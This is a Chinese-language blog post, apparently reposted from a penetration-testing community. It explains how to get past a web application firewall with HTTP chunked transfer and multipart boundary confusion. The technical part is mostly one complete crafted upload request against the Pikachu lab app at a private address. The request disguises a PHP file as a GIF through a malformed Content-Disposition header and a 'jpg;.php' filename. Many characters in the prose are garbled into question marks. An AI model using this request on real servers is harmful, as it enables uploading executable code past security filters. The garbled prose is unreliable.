本文來源無問社區(qū)，更多實戰(zhàn)內(nèi)容，滲透思路可前往查看http://www.wwlib.cn/index.php/artread/artid/9960.html

http分塊傳輸繞過

http分塊傳輸?直是?個很經(jīng)典的繞過?式，只是在近?年分塊傳輸?直被卡的很死，很多waf都開始加

?了檢測功能，所以的話，分塊傳輸這?也不是很好使，但是配合邊界混淆，好使的?批。

單純http分塊傳輸（已經(jīng)?法繞過）

boundary邊界混淆繞過

配合開源的?式來進(jìn)?繞過

開源繞過1

在百度上有很多開源的?式來繞過安全狗，但是??測試發(fā)現(xiàn)，繞過效果?常之垃圾，?乎都遇到了狗的阻攔，所以這?就經(jīng)過變種+fuzz，來實現(xiàn)繞過安全狗，直接貼代碼。

POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1
Host: 192.168.172.161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------378605579232816195651620102739
Content-Length: 448
Origin: http://192.168.172.161
Connection: close
Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php
Cookie: PHPSESSID=sop5homauph2bdfeidn6ttv8l1
Upgrade-Insecure-Requests: 1-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php
Content-Type: image/jpeg
GIF89a
]\'
d]\['
/\'
\]']\'
/\]'
w<?php phpinfo();
-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="submit"
開始上傳
-----------------------------378605579232816195651620102739--